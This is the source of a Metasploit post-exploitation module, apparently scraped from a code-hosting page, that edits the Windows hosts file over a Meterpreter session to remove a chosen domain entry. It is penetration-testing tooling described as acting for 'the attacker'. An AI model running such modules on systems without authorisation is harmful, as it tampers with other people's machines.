Path: blob/master/modules/post/windows/manage/remove_host.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Windows Manage Host File Entry Removal',12'Description' => %q{13This module allows the attacker to remove an entry from the Windows hosts file.14},15'License' => BSD_LICENSE,16'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],17'Platform' => [ 'win' ],18'SessionTypes' => [ 'meterpreter' ],19'Compat' => {20'Meterpreter' => {21'Commands' => %w[22core_channel_close23core_channel_eof24core_channel_open25core_channel_read26core_channel_tell27core_channel_write28]29}30},31'Notes' => {32'Stability' => [CRASH_SAFE],33'SideEffects' => [CONFIG_CHANGES],34'Reliability' => []35}36)37)3839register_options(40[41OptString.new('DOMAIN', [ true, 'Domain name to remove from the hosts file.' ])42]43)44end4546def hosts_path47root = client.sys.config.getenv('SystemRoot') ||48client.sys.config.getenv('windir') ||49'C:\\Windows'50"#{root}\\System32\\drivers\\etc\\hosts"51end5253def run54hosttoremove = datastore['DOMAIN']55path = hosts_path56fd = client.fs.file.new(path, 'r+b')5758# Get a temporary file path59meterp_temp = Tempfile.new('meterp')60meterp_temp.binmode6162print_status("Removing hosts file entry pointing to #{hosttoremove}")6364newfile = ''65fdray = fd.read.split("\r\n")6667fdray.each do |line|68main_part = line.split('#', 2).first.to_s.strip69parts = main_part.split(/\s+/)70if parts[1..-1].to_a.include?(hosttoremove)71parts.delete_if { |p| p.casecmp(hosttoremove).zero? }72next if parts.size < 27374rebuilt = parts.join(' ')75rebuilt += " " + line.split('#', 2).last if line.include?('#')76newfile += "#{rebuilt}\r\n"77else78newfile += "#{line}\r\n"79end80end8182fd.close8384meterp_temp.write(newfile)85meterp_temp.close8687client.fs.file.upload_file(path, meterp_temp)88print_good('Done!')89end90end919293